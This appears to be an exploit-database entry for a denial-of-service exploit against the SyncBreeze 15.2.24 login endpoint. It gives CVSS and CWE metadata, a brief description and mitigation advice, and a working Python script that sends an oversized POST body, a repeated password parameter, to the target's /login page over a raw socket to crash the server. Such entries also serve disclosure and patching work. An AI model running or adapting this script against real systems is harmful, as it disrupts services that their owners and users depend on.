SyncBreeze 15.2.24 -'login' Denial of Service

vendor:

SyncBreeze

by:

mohamed youssef

7.5

CVSS

HIGH

Denial of Service

CWE

Product Name: SyncBreeze

Affected Version From: 15.2.24

Affected Version To: 15.2.24

Patch Exists: NO

Related CWE:

CPE: syncbreeze

Metasploit:

Other Scripts:

Platforms Tested: Windows 10 64-bit

2023

SyncBreeze 15.2.24 -‘login’ Denial of Service

This exploit targets SyncBreeze version 15.2.24, a file synchronization software. By sending a specially crafted POST request to the login endpoint, an attacker can cause a denial of service (DoS) condition by overloading the server with a large payload.

Mitigation:

Apply the latest patch or update to a newer version of SyncBreeze that fixes the vulnerability. Additionally, limit the number of login attempts per IP address and implement rate limiting to prevent DoS attacks.

Source

Exploit-DB raw data:

# Exploit Title: SyncBreeze 15.2.24 -'login' Denial of Service
# Date: 30/08/2023
# Exploit Author: mohamed youssef
# Vendor Homepage: https://www.syncbreeze.com/
# Software Link: https://www.syncbreeze.com/setups/syncbreeze_setup_v15.4.32.exe
# Version: 15.2.24
# Tested on: windows 10 64-bit
import socket
import time


pyload="username=admin&password="+'password='*500+""
request=""
request+="POST /login HTTP/1.1\r\n"
request+="Host: 192.168.217.135\r\n"
request+="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\r\n"
request+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\n"
request+="Accept-Language: en-US,en;q=0.5\r\n"
request+="Accept-Encoding: gzip, deflate\r\n"
request+="Content-Type: application/x-www-form-urlencoded\r\n"
request+="Content-Length: "+str(len(pyload))+"\r\n"
request+="Origin: http://192.168.217.135\r\n"
request+="Connection: keep-alive\r\n"
request+="Referer: http://192.168.217.135/login\r\n"
request+="Upgrade-Insecure-Requests: 1\r\n"
request+="\r\n"
request+=pyload

print (request)
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.217.135",80))
s.send(request.encode())
print (s.recv(1024))
s.close()
time.sleep(5)